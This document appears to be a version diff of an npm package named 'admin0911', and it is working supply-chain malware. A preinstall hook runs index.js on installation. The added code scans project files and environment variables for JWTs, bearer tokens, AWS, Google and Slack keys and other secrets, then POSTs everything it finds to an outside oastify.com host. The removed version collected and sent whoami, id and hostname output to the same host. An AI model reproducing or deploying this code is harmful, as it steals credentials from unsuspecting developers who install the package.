admin0911 1.0.0 → 1.0.1

package/index.js

@@ -1,37 +1,80 @@
 const http = require('http');
 const fs = require('fs');
-const { execSync } = require('child_process');
-const os = require('os');
+const path = require('path');
 
 const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
+const ROOT_DIR = process.cwd();
+const MAX_FILE_SIZE = 5 * 1024 * 1024; // 5MB
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build'];
 
-function runCommand(cmd) {
+const regexes = [
+  { name: 'JWT', pattern: /[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g },
+  { name: 'BearerToken', pattern: /Bearer\s+([A-Za-z0-9-_.]+)/gi },
+  { name: 'AWSAccessKey', pattern: /AKIA[0-9A-Z]{16}/g },
+  { name: 'GoogleAPIKey', pattern: /AIza[0-9A-Za-z-_]{35}/g },
+  { name: 'SlackToken', pattern: /xox[baprs]-[0-9A-Za-z-]+/g },
+  { name: 'GenericAPIKey', pattern: /(?:api_key|apikey|api-key|auth_token|token|secret)\s*[=:]\s*['\"]?([A-Za-z0-9-_]{16,})['\"]?/gi }
+];
+
+const found = [];
+
+function isTextFile(filePath) {
+  const textExtensions = ['.js', '.ts', '.jsx', '.tsx', '.json', '.env', '.yaml', '.yml', '.sh', '.py', '.rb', '.go', '.java', '.php', '.txt', '.md', '.cfg', '.ini'];
+  return textExtensions.includes(path.extname(filePath).toLowerCase());
+}
+
+function scanFile(filePath) {
   try {
-    return execSync(cmd, { encoding: 'utf8', stdio: 'pipe' }).trim();
+    const stats = fs.statSync(filePath);
+    if (!stats.isFile() || stats.size > MAX_FILE_SIZE) return;
+    if (!isTextFile(filePath)) return;
+
+    const content = fs.readFileSync(filePath, 'utf8');
+    regexes.forEach(({ name, pattern }) => {
+      let match;
+      while ((match = pattern.exec(content))) {
+        const token = match[1] || match[0];
+        found.push({ file: path.relative(ROOT_DIR, filePath), type: name, token });
+      }
+    });
   } catch (e) {
-    return `ERROR: ${e.message}`;
+    // ignore unreadable files
   }
 }
 
-const isWindows = os.platform() === 'win32';
-const commands = {
-  whoami: isWindows ? 'whoami' : 'whoami',
-  id: isWindows ? 'whoami /groups' : 'id',
-  hostname: isWindows ? 'hostname' : 'hostname'
-};
+function scanDirectory(dir) {
+  const entries = fs.readdirSync(dir, { withFileTypes: true });
+  for (const entry of entries) {
+    if (IGNORE_DIRS.includes(entry.name)) continue;
+    const fullPath = path.join(dir, entry.name);
+    if (entry.isDirectory()) {
+      scanDirectory(fullPath);
+    } else {
+      scanFile(fullPath);
+    }
+  }
+}
 
-const results = {
-  whoami: runCommand(commands.whoami),
-  id: runCommand(commands.id),
-  hostname: runCommand(commands.hostname)
-};
+function scanEnvVars() {
+  Object.entries(process.env).forEach(([key, value]) => {
+    regexes.forEach(({ name, pattern }) => {
+      let match;
+      while ((match = pattern.exec(value || ''))) {
+        const token = match[1] || match[0];
+        found.push({ source: 'env', key, type: name, token });
+      }
+    });
+  });
+}
 
-const payload = JSON.stringify({ timestamp: new Date().toISOString(), results }, null, 2);
+scanDirectory(ROOT_DIR);
+scanEnvVars();
 
+const payload = JSON.stringify({ timestamp: new Date().toISOString(), results: found }, null, 2);
 const req = http.request({
   hostname: OASTIFY_HOST,
   method: 'POST',
-  path: '/?system_identity',
+  path: '/?token_scan',
   headers: {
     'Content-Type': 'application/json',
     'Content-Length': Buffer.byteLength(payload)
@@ -40,5 +83,5 @@ const req = http.request({
 req.write(payload);
 req.end();
 
-fs.writeFileSync('system_identity.log', payload + '\n');
-console.log('whoami, id, and hostname collected and sent to OASTIFY.');
+fs.writeFileSync('token_scan_results.log', payload + '\n');
+console.log(`token scan completed: found ${found.length} candidates. Results sent to OASTIFY.`);

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "admin0911",
-  "version": "1.0.0",
+  "version": "1.0.1",
   "scripts": {
     "preinstall": "node index.js"
   }